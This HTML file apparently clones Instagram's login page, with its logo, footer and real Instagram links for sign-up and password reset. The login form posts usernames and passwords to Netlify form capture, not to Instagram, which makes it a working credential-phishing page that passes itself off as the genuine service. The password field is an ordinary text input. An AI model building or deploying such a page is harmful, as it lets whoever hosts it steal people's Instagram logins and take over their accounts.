<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" href="img/favicon.ico" type="image/x-icon">
</head>

<body>
    <div class="mian-container">
        <div class="img-container">
            <div class="image">
                <img src="img/image.png" alt="">
            </div>
            
        </div>
        <div class="login-container">
            <div class="login-box1 column">
                <div class="logo">
                    <img src="img/logo.png" alt="Instagram logo">
                </div>
                <div class="form-box">
                    <form name="login-form" method="POST" data-netlify="true">
                    <input type="text" placeholder="Phone number, username, or email" name="emai">
                    <input type="text" placeholder="Password" name="password">
                    <button type="submit">Log In</button></form>
                </div>
                <div class="h-line">
                    <div class="line1"></div>
                    <div class="or">OR</div>
                    <div class="line2"></div>
                </div>
                <div class="facbok-login">
                    <a href="https://www.instagram.com/fxcal/disclosure/?next=%2F"><img src="img/124010.png"
                            alt="facebook logo">Log in with Facebook</a>
                </div>
                <div class="forget-pas">
                    <a href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a>
                </div>
            </div>
            <div class="login-box2">
                <div class="sign-up">
                    <p>Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a></p>
                </div>
            </div>
            <div class="login-box3 column">
                <div class="text">Get the app.</div>
                <div class="image">
                    <a href="https://apps.apple.com/app/instagram/id389801252?vt=lo">
                        <img src="img/storeimg1.png" alt=""></a>
                    <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3D6FB4C2FF-E719-444F-9222-C052E8F965DB%26utm_content%3Dlo%26utm_medium%3Dbadge">
                        <img src="img/storeimg2.png" alt="">
                    </a>
                </div>
            </div>

        </div>
    </div>
    <footer>
        <div class="foot">

            <ul class="links">
                <li>Meta</li>
                <li>About</li>
                <li>Blog</li>
                <li>Jobs</li>
                <li>Help</li>
                <li>API</li>
                <li>Privacy</li>
                <li>Terms</li>
                <li>Top Accounts</li>
                <li>Hashtags</li>
                <li>Locations</li>
                <li>Instagram Lite</li>
                <li>Contact Uploading & Non-Users</li>
                <li>Dance</li>
                <li>Food & Drink</li>
                <li>Home & Garden</li>
                <li>Music</li>
                <li>Visual Arts</li>
            </ul>
            <div class="copy-right">
                <p>English</p>
                <p>© 2022 Instagram from Meta</p>
            </div>
        </div>
    </footer>
</body>
</html>
